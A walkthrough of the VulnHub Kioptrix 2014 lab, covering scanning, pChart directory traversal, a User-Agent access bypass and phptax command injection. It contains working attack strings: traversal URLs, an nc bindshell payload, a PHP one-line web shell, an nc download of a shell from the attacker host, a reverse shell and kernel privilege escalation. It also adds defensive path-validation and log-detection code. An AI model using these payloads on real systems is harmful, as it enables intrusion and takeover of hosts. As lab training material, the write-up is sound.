# Lab practice: Kioptrix5

## Lab setup

Download: https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2

Add a NAT-mode network adapter; the VM gets the IP address 192.168.74.137.

## Information gathering

### nmap

Quick full-port scan:

```terminal
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:50 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds
```

Service and version detection on those three ports:

```terminal
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p 22,80,8080 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:53 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00040s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
```

Port 22 is reported closed, yet it still shows up in the scan; my guess is that it is being relayed through the proxy on port 8080.

## The port 80 page

Opening port 80 in a browser and looking at the page source reveals a hint:

```html
<head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>
```

pChart is mentioned, so search for known vulnerabilities:

```terminal
┌──(root㉿kali)-[~]
└─# searchsploit pchart
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
pChart 2.1.3 - Multiple Vulnerabilities       | php/webapps/31173.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
```

There really is one.

## Summary of findings

  • pChart 2.1.3 vulnerabilities
  • Apache 2.2.21
  • SSH brute force
  • HTTP proxy (possibly reGeorg)

## Exploitation

### pChart

Read the exploit write-up:

```terminal
┌──(root㉿kali)-[~/Desktop]
└─# cat 31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.
```

Looking at the actual vulnerable spot, it is an arbitrary file read: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

That reads the file straight away.

There is also an XSS, which is of little use here.
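As an added example (not code from this post or from pChart), here is how a file-view parameter like `Script` can be resolved so that the decoded `/../../etc/passwd` value above is refused while a real example file is served; the directory layout and function names are my own assumptions:

```python
# Added example (not part of the original write-up or of pChart): resolve a
# "Script=" style file-view parameter so the traversal shown above is rejected.
# Directory layout and function names are assumptions made for this demo.
import os
import tempfile
from urllib.parse import unquote


def resolve_script(examples_dir: str, script_param: str):
    """Return the real path of a file under examples_dir, or None when the
    URL-decoded parameter escapes that directory or is not a regular file."""
    decoded = unquote(script_param)
    if "\x00" in decoded:            # a NUL would truncate the path in C-based runtimes
        return None
    base = os.path.realpath(examples_dir)
    # lstrip("/") anchors absolute-looking values under base instead of at "/"
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    # realpath collapses ".." and symlinks; the result must still lie inside base
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Build a throwaway tree mirroring the target layout and try three values."""
    with tempfile.TemporaryDirectory() as root:
        examples = os.path.join(root, "pChart2.1.3", "examples")
        os.makedirs(examples)
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(examples, "example.draw.line.php"), "w") as f:
            f.write("<?php // constructed sample example file\n")
        with open(os.path.join(root, "etc", "passwd"), "w") as f:
            f.write("root:*:0:0:Charlie &:/root:/bin/sh\n")   # constructed stand-in
        return {
            "legit": resolve_script(examples, "example.draw.line.php"),
            "traversal": resolve_script(examples, "/../../etc/passwd"),
            "encoded": resolve_script(examples, "%2f..%2f..%2fetc/passwd"),
        }


if __name__ == "__main__":
    print(demo())
```

The stand-in passwd file exists in the temporary tree, so the rejection comes from the containment check rather than from the file being absent.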

So right now the only thing in hand is a file-read bug; the next step is to chain it with other information, using the LFI to learn more about the host.

We know for certain the machine runs Apache, so read its configuration file: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

```apache
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

Include etc/apache22/Includes/*.conf
```

The vhost on port 8080 only admits requests that carry the Mozilla4_browser environment variable, which the SetEnvIf line sets for any User-Agent starting with Mozilla/4.0:

```terminal
┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
```

There is a phptax directory; take a look at it:

```terminal
┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080/phptax/
```

A pile of components comes back; phptax is presumably some kind of CMS, so search Metasploit for an exploit module:

```terminal
msf6 > search phptax

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/phptax_exec  2012-10-08       excellent  Yes    PhpTax pfilez Parameter Exec Remote Code Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/phptax_exec
```


### phptax

Using msf directly, none of the available payloads worked, which was a pain.

searchsploit has an entry for it as well: there is an RCE.

drawimage.php, line 63:

```php
include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
```

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

`http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make`

Exploit-DB Verified:

`http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make`



The pfilez parameter gives RCE: a `;` closes off the shell command that the script builds around the value, so whatever follows runs as a separate command. An exploit is provided, but trying it directly did not work; after some reading I found the reason:

> The FreeBSD version of nc does not ship with the execute option, which means I cannot use it to get a reverse shell.
> Source: https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/

So the natural idea is to upload a shell and run that. The simplest is a one-line web shell: `http://192.168.74.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php echo system($_GET["cmd"]) ?>' > 1.php;&pdf=make`

System commands can now be executed.
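As an added example (not part of the original post), here is defender-side detection logic that flags the three request shapes used above, the pChart Script traversal, the phptax pfilez injection and the dropped cmd web shell, when they appear in Apache combined-format access logs; the log lines are constructed to mirror the URLs in the text and the function names are my own:

```python
# Added example (not from the original post): flag the request shapes used in
# this walkthrough when they show up in Apache combined-format access logs.
# Log lines are constructed to mirror the URLs in the text; names are my own.
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r"[;|&`$]")      # characters that end or chain a shell command


def query_params(query: str) -> dict:
    """Split on '&' only (a literal ';' stays inside its value) and decode twice,
    so a double-encoded %252f is seen as '/' as well."""
    params = {}
    for pair in query.split("&"):
        if pair:
            k, _, v = pair.partition("=")
            params.setdefault(unquote(k), []).append(unquote(unquote(v)))
    return params


def inspect(line: str):
    """Return a finding record for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("uri").partition("?")
    params = query_params(query)
    findings = []
    if any(".." in v for v in params.get("Script", [])):
        findings.append("pchart-traversal")          # index.php?Action=View&Script=/../..
    if any(SHELL_META.search(v) for v in params.get("pfilez", [])):
        findings.append("phptax-pfilez-injection")   # drawimage.php?pfilez=xxx;...
    if "cmd" in params and path.endswith(".php"):
        findings.append("webshell-cmd-param")        # 1.php?cmd=... written via the RCE
    return {"ip": m.group("ip"), "path": path, "findings": findings}


SAMPLE_LOG = [  # constructed lines, one per request shape plus a benign one
    '192.168.74.129 - - [07/Apr/2024:10:02:11 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1732 "-" "Mozilla/5.0"',
    '192.168.74.129 - - [07/Apr/2024:10:15:40 -0400] "GET /phptax/drawimage.php?pfilez=xxx;echo%20%27%3C?php%20echo%20system($_GET[%22cmd%22])%20?%3E%27%20%3E%201.php;&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
    '192.168.74.129 - - [07/Apr/2024:10:16:02 -0400] "GET /phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%20shell.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"',
    '192.168.74.129 - - [07/Apr/2024:10:16:30 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.draw.line.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Only lines with at least one finding are reported."""
    return [r for r in map(inspect, lines) if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The `cmd` check is deliberately narrow to this box's web shell name; in a real deployment it would be keyed on PHP files that were never part of the application's release.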

wget is not present on the target, but nc is, so try transferring the file with nc.

Serve the file (a listener that feeds shell.php to whoever connects):

```terminal
┌──(root㉿kali)-[~]
└─# nc -l -p 8888 < shell.php
```

Listen for the reverse shell:

```terminal
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
```


RCE: `http://192.168.74.137:8080/phptax/1.php?cmd=nc 192.168.74.129 8888 > shell.php`

Once shell.php has been written, requesting it directly runs it and the shell calls back:

```terminal
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.137] 19685
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
3:03AM up 2:26, 0 users, load averages: 0.11, 0.11, 0.04
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ whoami
www
```


But this is a low-privilege user (www), so privilege escalation is needed.

### Privilege escalation

`uname -a` shows the kernel is `FreeBSD 9.0`. A searchsploit search turns up privilege-escalation exploits for it, so transfer one over and compile it with the gcc present on the target:

`http://192.168.74.137:8080/phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%2028718.c`

`http://192.168.74.137:8080/phptax/1.php?cmd=gcc%20-o%20exploit%2028718.c`

`28718.c` gave me problems when compiling on the target, so I used a different one, `26368.c`.

After transferring it, compile it with gcc and run `a.out`, which gives root directly:

```terminal
$ gcc exp.c
exp.c:89:2: warning: no newline at end of file
$ ./a.out
whoami
root
```


## Wrap-up

Many unexpected situations came up, and the methods I had in mind never applied as smoothly as hoped. After getting the one-line web shell I wanted a reverse shell, but unfamiliarity with the tools and a missing understanding of how the callback actually works cost a lot of time; once the target turned out to have no wget I did not know how to transfer files. The everyday tools are not as well practiced as I thought, and I need more practice.

Some concrete failure causes I still cannot get to the bottom of: for example, during privilege escalation, why did `28718.c` fail to run after compiling? During the reverse shell attempts, why did the session fail to establish so many times? Answering these needs a deep understanding of the operating-system level, of how the tools are designed, and of networking fundamentals.